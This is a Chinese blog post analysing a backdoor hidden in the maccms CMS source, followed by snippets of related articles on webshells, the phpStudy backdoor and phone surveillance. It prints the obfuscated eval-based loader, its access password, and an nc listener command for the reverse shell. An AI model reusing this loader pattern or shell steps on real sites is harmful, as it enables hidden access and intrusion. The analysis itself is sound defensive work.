maccms后门分析

Maccms 后门分析

Maccms网站基于php+mysql的系统,有易用性、功能良好等优点,用途广泛

打开源码

maccms10\extend\Qcloud\Sms\sms.php是一个后门

maccms10\extend\upyun\src\Upyun\Api\format.php也是一个后门

可以看到两者内容一样

<?php

error_reporting(E_ERROR);

@ini_set(‘display_errors‘,‘Off‘);

@ini_set(‘max_execution_time‘,20000);

@ini_set(‘memory_limit‘,‘256M‘);

header("content-Type: text/html; charset=utf-8");

$password = "0d41c75e2ab34a3740834cdd7e066d90";//密码WorldFilledWithLove

function s{

$str=”编码之后的恶意代码”;

$str = str_rot13($str);//对恶意代码进行ROT13编码

m($str);

}

function m($str){

global $password;

$jj = ‘‘;

eval($jj.pack(‘H*‘,$str).$jj);//对混淆的php进行解码,解码之后的代码执行对eval函数的解析

}

s();

?>

访问

解码后的密码敲进去WorldFilledWithLove

反弹shell(将肉鸡/目标机上的终端或者解析器或shell弹到攻击者的电脑中,需要攻击者提前监听,使用NC监听:nc –lvvp 7777,-l)

原文地址:https://www.cnblogs.com/shayanboy/p/11691414.html

时间: 2024-11-13 10:57:18

maccms后门分析的相关文章

10.16Maccms后门分析、Sudo提权漏洞(CVE-2019-14287)复现

Maccms后门分析 maccms网站基于php+mysql的系统,易用性.功能良好等优点,用途范围广 打开源码,extend\Qcloud\Sms\Sms.php.extend\upyun\src\Upyun\Api\Format.php是两个后门(Sms.php和Format.php是后门木马 二者代码相同) <?php error_reporting(E_ERROR);//报错 @ini_set('display_errors','Off'); @ini_set('max_executio

PHP后门新玩法:一款猥琐的PHP后门分析

0x00 背景 近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这个奇葩的Webshell吧. 0x01 细节 Webshell代码如下: <?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empt

Hacking Team后门分析

前言   Hacking Team数据泄露事件前段时间引起了一场轩然大波,虽然事件已经过去很久了,但是卫士在最近捕获到了一个与Hacking Team相关的一个后门,但是样本捕获不全,只捕获到了一个dll文件.在分析的时候发现,就一个dll而已,就做了大量的操作,想想如果是一个完整的样本的话....毕竟HT   样本分析   看看这些导出函数   样本分析 干扰分析手段 0x01敏感信息加密处理   1.对敏感字符串进行加密处理   列出被解密的部分敏感信息: 1002139B  |.  68

使用Ghidra分析phpStudy后门

一.工具和平台 主要工具: Kali Linux Ghidra 9.0.4 010Editor 9.0.2 样本环境: Windows7 phpStudy 20180211 二 .分析过程 先在 Windows 7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中. 根据网上公开的信息:后门存在于 php_xmlrpc.dll 文件中,里面存在“eval”关键字,文件 MD5 为 c339482fd2b233fb0a555b629c0ea5d

移动安全初探:窃取微信聊天记录、Hacking Android with Metasploit

在这篇文章中我们将讨论如何获取安卓.苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制.文章比较基础.可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣. (文章内容存在一定攻击性,目的在于普及终端安全知识.提高安全意识,如有非法使用,后果自负) “如何获取Android.iPhone手机上的微信聊天记录? ” 0×00 条件: 安卓设备已获取root权限,安装SSHDroid(通过ssh.ftp连接手机) Apple设备越狱,安

IDF-CTF-图片里的英语 答题笔记

题目链接:http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=34 一恒河沙中有三千世界,一张图里也可以有很多东西.不多说了,答案是这个图片包含的那句英文的所有单词的首字母.首字母中的首字母要大写,答案格式是wctf{一坨首字母}加油吧少年!看好你哦~ 思路:信息隐藏在图片(这是小李,会不会是小李说过的什么话呢,脑洞中……)中,使用cat, strings命令查看没有什么有效的字符串.回想以前做过wechall中一个把信息

Apache服务器的简单配置与安全策略

在之前讲的关于weevely后门分析中,有说到利用Apache的配置文件.htaccess来隐藏php后门.关于.htaccess文件的用途,在此结合Apache服务器的具体配置作一详解,也算是自己的学习笔记了... 一  Apache服务器的搭建 详见之前的博文:CentOS 6.0下phpvod搭建教程(LAMP+phpvod) 二  httpd.conf文件的全局配置 1. ServerRoot  设置服务器目录的绝对路径,即Apache服务器的安装及配置文件.一般在/etc/httpd目

Xshell高级后门完整分析报告(ZT)

1. 前言 近日,Xshell官方发布公告称其软件中存在后门.我们的实习生同学对该后门进行了详细的分析,确认这是一个具备恶意代码下载执行和数据回传等能力的高级木马. 后门代码存在于nssock2.dll中,采用了多层加密shellcode.花指令.线程注入等各种方式逃避杀软查杀和对抗人工分析.总体流程如下 2. 详细过程分析 2.1 第一层功能分析 通过BinDiff跟最新版的nssock2.dll比较可以很容易的发现一个解密shellcode的函数 去掉花指令分析,进入到shellcode后主

存储过程造成严重安全后门——记某电商SQL注入安全事件实例分析

3月女人节,电商行业自己创办的节日,着实让爱购物的女人们疯狂了一把.默默躲在屏幕背后的黑手,此时也正值忙碌时期.事后,笔者有幸被邀请参与A公司黑客入侵电商ERP系统安全事件的评估分析.黑客采取的手段和事后的原因追查分析,隐去客户信息,分享给大家,警示防范. 事件起由,公司发现电商ERP系统后台数据库(oracle)被SQL注入,特别严重的是应用所用的普通用户账号被提升为DBA权限:所幸的是入侵者并未对数据库的后台数据进行破坏,比如truncate table或drop database,否则后果